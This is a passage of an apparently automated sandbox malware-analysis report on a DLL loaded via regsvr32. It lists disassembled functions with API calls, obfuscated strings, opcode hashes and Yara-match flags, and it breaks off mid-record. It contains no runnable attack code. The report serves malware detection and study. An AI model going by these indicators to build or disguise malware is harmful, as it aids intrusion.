                                                                      • GetStdHandle.KERNEL32(?,?,?,?,?,00007FFA526A7194,?,?,?,?,00007FFA526A6C69,?,?,00000000,00007FFA526A30C0), ref: 00007FFA526A70DB
                                                                      • WriteFile.KERNEL32 ref: 00007FFA526A7115
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: File$HandleModuleNameWrite
                                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                      • API String ID: 3784150691-4022980321
                                                                      • Opcode ID: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                      • Instruction ID: dff69e991f5a39f92f4e28816e7cc45507b5cc2ed09b7f144a1723dc13437372
                                                                      • Opcode Fuzzy Hash: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                      • Instruction Fuzzy Hash: 2051F021B1868381FB209B21AC567BA22D2FF96384F4CC136DE0C46EDECFBCE1059201
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A20E0 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3778485334-0
                                                                      • Opcode ID: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                      • Instruction ID: 83dde26e0394166d82c23feffab097d2cefe70178072827e2d6d8e2f7b8beffe
                                                                      • Opcode Fuzzy Hash: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                      • Instruction Fuzzy Hash: A131E232908B86C5EB119B14FC943AA73E4FB86344F588036DA8D42B6DDFBCE088C701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AE6C0 Relevance: 10.8, APIs: 7, Instructions: 301COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _lock.LIBCMT ref: 00007FFA526AE6EB
                                                                      • free.LIBCMT ref: 00007FFA526AE7E2
                                                                        • Part of subcall function 00007FFA526A3024: HeapFree.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A303A
                                                                        • Part of subcall function 00007FFA526A3024: _errno.LIBCMT ref: 00007FFA526A3044
                                                                        • Part of subcall function 00007FFA526A3024: GetLastError.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A304C
                                                                      • ___lc_codepage_func.LIBCMT ref: 00007FFA526AE76B
                                                                        • Part of subcall function 00007FFA526A6550: RtlCaptureContext.KERNEL32 ref: 00007FFA526A658F
                                                                        • Part of subcall function 00007FFA526A6550: IsDebuggerPresent.KERNEL32 ref: 00007FFA526A662D
                                                                        • Part of subcall function 00007FFA526A6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFA526A6637
                                                                        • Part of subcall function 00007FFA526A6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFA526A6642
                                                                        • Part of subcall function 00007FFA526A6550: GetCurrentProcess.KERNEL32 ref: 00007FFA526A6658
                                                                        • Part of subcall function 00007FFA526A6550: TerminateProcess.KERNEL32 ref: 00007FFA526A6666
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentTerminate___lc_codepage_func_lockfree
                                                                      • String ID:
                                                                      • API String ID: 178205154-0
                                                                      • Opcode ID: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                      • Instruction ID: 0536c4ec7bf5b27169877939ed25b95e181c05ac9460494b792dee3f7c26bc1e
                                                                      • Opcode Fuzzy Hash: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                      • Instruction Fuzzy Hash: BAD1A222E08282C5E7609F249C5167976D6FF87740F48C135DA8E57E9ECFBCE8519701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526ADF98 Relevance: 10.6, APIs: 7, Instructions: 136COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA526AE1C2), ref: 00007FFA526ADFF2
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA526AE1C2), ref: 00007FFA526AE004
                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA526AE1C2), ref: 00007FFA526AE04F
                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA526AE1C2), ref: 00007FFA526AE0E1
                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA526AE1C2), ref: 00007FFA526AE11B
                                                                      • free.LIBCMT ref: 00007FFA526AE12F
                                                                        • Part of subcall function 00007FFA526A6C34: _FF_MSGBANNER.LIBCMT ref: 00007FFA526A6C64
                                                                        • Part of subcall function 00007FFA526A6C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFA526A30C0,?,?,00000000,00007FFA526A6B19,?,?,00000000,00007FFA526A6BC3), ref: 00007FFA526A6C89
                                                                        • Part of subcall function 00007FFA526A6C34: _errno.LIBCMT ref: 00007FFA526A6CAD
                                                                        • Part of subcall function 00007FFA526A6C34: _errno.LIBCMT ref: 00007FFA526A6CB8
                                                                      • GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA526AE1C2), ref: 00007FFA526AE145
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale$_errno$AllocateByteCharErrorHeapLastMultiWidefree
                                                                      • String ID:
                                                                      • API String ID: 2309262205-0
                                                                      • Opcode ID: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                      • Instruction ID: 7626336b7c3cac7a89bd0f4da3d72910e3368512d92bf1e03118835db621df02
                                                                      • Opcode Fuzzy Hash: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                      • Instruction Fuzzy Hash: F8519E32A08692C6EB649F219C4156963E2FB467A4F5C8635DA1E53FDCCFBCE8509300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AFCA0 Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$DecodePointer_lock
                                                                      • String ID:
                                                                      • API String ID: 2175075375-0
                                                                      • Opcode ID: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                      • Instruction ID: 2f5846bf177c5d7c2a8d405d90712e50eb5f323273204edc7d8efa8f4c0a2a8b
                                                                      • Opcode Fuzzy Hash: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                      • Instruction Fuzzy Hash: 8E316F22A18653C2FB15AB61985277A61D1EF86780F18C534DA0D4BFCEDFADD411A701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A6550 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                      • String ID:
                                                                      • API String ID: 1269745586-0
                                                                      • Opcode ID: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                      • Instruction ID: 84aa14fe649d3bef65d9e23b9ff0817ff10448864e03f6619a845a4328d15e09
                                                                      • Opcode Fuzzy Hash: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                      • Instruction Fuzzy Hash: 49311C32A0CBC682EA248B54E8443AAB3E4FB8A744F544135DB8D43E5DDFBCD189CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180022010 Relevance: 9.0, Strings: 7, Instructions: 235COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                      • API String ID: 0-2447245168
                                                                      • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                      • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                      • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                      • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AC16C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID: ACP$OCP
                                                                      • API String ID: 2299586839-711371036
                                                                      • Opcode ID: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                      • Instruction ID: c9338d8ec67f65fb279d1c920d9504fe033765055d1d95ac2d28c8faeb464c4b
                                                                      • Opcode Fuzzy Hash: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                      • Instruction Fuzzy Hash: 67213E22B08683C5FA609B21ED612B963E0FF56784F8CC131DA4D46D99EFACE945D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180003598 Relevance: 8.2, Strings: 6, Instructions: 720COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 1h$I-$IY$QL&$li7$o
                                                                      • API String ID: 0-890095520
                                                                      • Opcode ID: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                      • Instruction ID: 3309774e0679b3a301b7d0c809474a48ec240f33eb9a68417431e078f6a2137f
                                                                      • Opcode Fuzzy Hash: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                      • Instruction Fuzzy Hash: 72921875604BC88BCBB8DF24DC85BDD7BE0FB86305F20561DD85E9AA60CBB85645CB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000AC48 Relevance: 8.0, Strings: 6, Instructions: 548COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 1$ {,$"$$-%$Rku$ i
                                                                      • API String ID: 0-1845893065
                                                                      • Opcode ID: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                      • Instruction ID: cb6ea2ed9b9de3b3effb5fe074f3157ffd1060f729125c5012da7c2884d2f589
                                                                      • Opcode Fuzzy Hash: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                      • Instruction Fuzzy Hash: EB52D470544BCA8BCBB8CF24CC85BEF7BA0FB44306F155529D89A8A291DBB85749CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180029B28 Relevance: 8.0, Strings: 6, Instructions: 535COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: VUS/$YV~$p$@$EX$OX
                                                                      • API String ID: 0-2743166816
                                                                      • Opcode ID: 5155f202f137bac6474ba6043cf7c54f40f5ffdfe883d22239fc44ed7813b08b
                                                                      • Instruction ID: 6ceb6cba6b0314249f0ec67deadc173c496f62a90fe3cec01f017443767c42d8
                                                                      • Opcode Fuzzy Hash: 5155f202f137bac6474ba6043cf7c54f40f5ffdfe883d22239fc44ed7813b08b
                                                                      • Instruction Fuzzy Hash: BD3213711097848FD3A9CF68C58A65BBBF0FBCA744F104A1DF68687260C7B6D949CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800059B8 Relevance: 7.9, Strings: 6, Instructions: 408COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                      • API String ID: 0-2100131636
                                                                      • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                      • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                      • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                      • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180013780 Relevance: 7.8, Strings: 6, Instructions: 323COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                      • API String ID: 0-2401169580
                                                                      • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                      • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                      • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                      • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A4558 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                      • String ID:
                                                                      • API String ID: 1445889803-0
                                                                      • Opcode ID: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                      • Instruction ID: be4ecc022d71142122834816d8823b1971dbba7c0c908a5462bf79a2c132fad3
                                                                      • Opcode Fuzzy Hash: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                      • Instruction Fuzzy Hash: 73018421629A4582EB508F21FD5026573E4FB4AB90F48A530DF9E47BA8DFBCD8958300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000FC48 Relevance: 6.7, Strings: 5, Instructions: 447COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )#?$EX.$PT$UbA$2f
                                                                      • API String ID: 0-1318892062
                                                                      • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                      • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                      • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                      • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001FC0C Relevance: 6.6, Strings: 5, Instructions: 400COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $T$?F$QP|m$qjf$tZp
                                                                      • API String ID: 0-3477398917
                                                                      • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                      • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                      • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                      • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180016D3C Relevance: 6.6, Strings: 5, Instructions: 379COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: JQ$k&($t$v$x\J
                                                                      • API String ID: 0-1134872184
                                                                      • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                      • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                      • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                      • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000703C Relevance: 6.3, Strings: 5, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: R$)H8$?rIc$L==$V
                                                                      • API String ID: 0-2512384441
                                                                      • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                      • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                      • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                      • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800119A8 Relevance: 6.3, Strings: 5, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Qq$bt$vird$+$S
                                                                      • API String ID: 0-3373980505
                                                                      • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                      • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                      • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                      • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AC450 Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale$_getptd
                                                                      • String ID:
                                                                      • API String ID: 1743167714-0
                                                                      • Opcode ID: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
